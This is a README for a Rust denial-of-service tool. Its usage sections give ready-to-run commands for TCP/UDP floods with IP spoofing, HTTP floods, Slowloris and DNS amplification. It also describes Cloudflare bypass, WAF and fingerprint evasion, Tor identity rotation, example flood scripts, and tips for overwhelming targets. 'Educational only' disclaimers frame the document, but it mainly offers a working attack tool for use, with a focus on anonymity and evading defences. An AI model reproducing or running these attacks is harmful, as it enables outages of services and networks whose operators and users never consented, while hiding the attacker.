WARNING - EDUCATIONAL PURPOSE ONLY: This tool is designed for authorized penetration testing and educational purposes. The author is not responsible for any misuse.
This is a high-performance DDoS testing tool written in Rust, featuring:
- Layer 4 Attacks: TCP/UDP flooding with IP spoofing
- Layer 7 Attacks: HTTP flooding and Slowloris attacks
- Tor Integration: Complete anonymity support
- Multi-threading: Lightning-fast concurrent operations
- Cross-platform: Works on Linux, macOS, and Windows
- Cloudflare Bypass: Automatic challenge solving and TLS fingerprint evasion
- WAF Evasion: Advanced payload encoding and header manipulation
- User-Agent Database: 1000+ real browser signatures with rotation
- Fingerprint Evasion: JA3/HTTP2 fingerprint randomization
- Stealth Mode: Anti-detection with behavioral mimicry
- DNS Amplification: High-impact reflection attacks
- Proxy Integration: SOCKS5/HTTP proxy chain support
- Operating System: Linux (recommended), macOS, or Windows
- RAM: Minimum 512MB, recommended 2GB+
- CPU: Multi-core processor recommended
- Network: High-bandwidth connection for effective testing
-
Rust (version 1.70+)
# Install Rust curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh source ~/.cargo/env
-
Tor (optional, for anonymity features)
# Ubuntu/Debian sudo apt update && sudo apt install tor # macOS with Homebrew brew install tor # CentOS/RHEL sudo yum install tor
-
Root privileges (required for IP spoofing features)
# Clone the repository
git clone https://github.com/karthik558/ddos-attack.git
cd ddos-attack
# Make scripts executable
chmod +x build.sh install.sh
# Build the project
./build.sh
# Install system-wide (optional)
sudo ./install.sh
# Clone and build manually
git clone https://github.com/karthik558/ddos-attack.git
cd ddos-attack
cargo build --release
# Binary will be at: ./target/release/ddos-attack
The tool now automatically asks you about Tor usage and IP spoofing when you run attacks - no need for complex command-line flags!
./target/release/ddos-attack [ATTACK_TYPE] [OPTIONS]
./target/release/ddos-attack layer4 \
--targets "192.168.1.100" \
--ports "80,443,8080" \
--protocol tcp \
--threads 50 \
--rate 1000 \
--size 1024
# The tool will ask:
# π Do you want to use Tor for anonymity? (y/N):
./target/release/ddos-attack layer4 \
--targets "192.168.1.100" \
--ports "53,123,161" \
--protocol udp \
--threads 100 \
--rate 2000 \
--size 512
# The tool will ask:
# π Do you want to use Tor for anonymity? (y/N):
# π Do you want to enable IP spoofing? (requires root) (y/N):
./target/release/ddos-attack layer7 \
--targets "https://example.com" \
--threads 50 \
--rate 100 \
--method GET \
--user-agent "Mozilla/5.0 Custom Agent"
# The tool will ask:
# π Do you want to use Tor for anonymity? (y/N):
./target/release/ddos-attack layer7 \
--targets "https://example.com" \
--threads 100 \
--rate 200 \
--method GET \
--cloudflare-bypass \
--waf-evasion \
--random-useragent
# Includes:
# - Cloudflare challenge bypass
# - WAF evasion techniques
# - Random User-Agent rotation
./target/release/ddos-attack dns-amp \
--target "192.168.1.100" \
--domain "google.com" \
--threads 20 \
--rate 500 \
--duration 300
# High-impact reflection attack
# Up to 70x amplification factor
./target/release/ddos-attack layer7 \
--targets "https://example.com" \
--threads 300 \
--slowloris
# The tool will ask:
# π Do you want to use Tor for anonymity? (y/N):
# Start Tor service
./target/release/ddos-attack tor --start
# Renew Tor identity (change IP)
./target/release/ddos-attack tor --renew
# Stop Tor service
./target/release/ddos-attack tor --stop
The examples/
folder contains pre-configured attack scripts for common scenarios:
tcp_flood.sh
- Basic TCP flooding attackhttp_flood_tor.sh
- HTTP attack through Tor networkslowloris.sh
- Slowloris connection exhaustion attackudp_spoof.sh
- UDP flooding with IP spoofing (requires root)
# Make examples executable
chmod +x examples/*.sh
# Run a specific example
./examples/tcp_flood.sh
# Or run with root for spoofing examples
sudo ./examples/udp_spoof.sh
Note: Edit the target IPs and parameters in the example scripts before running!
--targets
: Target IP addresses (comma-separated)--ports
: Target ports (comma-separated)--protocol
: Attack protocol (tcp
orudp
)--threads
: Number of concurrent threads (default: 100)--size
: Packet size in bytes (default: 1024)--rate
: Packets per second (default: 1000)
Interactive prompts will ask about:
- Tor usage for anonymity
- IP spoofing (UDP only, requires root)
--targets
: Target URLs (comma-separated)--threads
: Number of concurrent threads (default: 50)--rate
: Requests per second (default: 100)--method
: HTTP method (GET
,POST
,PUT
,DELETE
)--user-agent
: Custom User-Agent string--slowloris
: Enable Slowloris attack mode
Interactive prompts will ask about:
- Tor usage for anonymity
- Requires root/administrator privileges
- May be blocked by ISP or network equipment
- Use responsibly and only on authorized networks
- Automatically handles Tor daemon management
- Slower but provides anonymity
- Identity renewal changes exit nodes
- Optimize Thread Count: Start with 50-100 threads, adjust based on system performance
- Rate Limiting: Higher rates = more aggressive attacks but may crash targets
- Multiple Targets: Distribute load across multiple targets for better results
- Monitor Resources: Watch CPU and memory usage during attacks
"Permission denied" errors:
# For IP spoofing features, run with sudo
sudo ./target/release/ddos-attack layer4 --spoof
"Connection refused" on Tor:
# Make sure Tor is installed and started
./target/release/ddos-attack tor --start
# Wait 10-15 seconds for Tor to initialize
High CPU usage:
# Reduce thread count
./target/release/ddos-attack layer4 --threads 20
Compilation errors:
# Update Rust toolchain
rustup update
# Clean and rebuild
cargo clean && cargo build --release
- Install requirements (Rust + Tor)
- Clone and build the project
- Start with examples to learn
- Modify parameters for your needs
- Always test responsibly
# 1. Build the tool
./build.sh
# 2. Test basic TCP attack
./examples/tcp_flood.sh
# 3. Try anonymous HTTP attack
./examples/http_flood_tor.sh
# 4. Advanced: UDP spoofing
sudo ./examples/udp_spoof.sh
- Penetration testing with written permission
- Educational purposes and research
- Testing your own infrastructure
- Security awareness demonstrations
- Attacking systems without authorization
- Disrupting public services
- Any illegal activities
- Harming others' infrastructure
- Fork the repository
- Create a feature branch
- Make your improvements
- Test thoroughly
- Submit a pull request
This project is licensed under the MIT License - see the LICENSE file for details.
KARTHIK-LAL
- GitHub: @karthik558
WARNING: With great power comes great responsibility. Use this tool ethically and legally!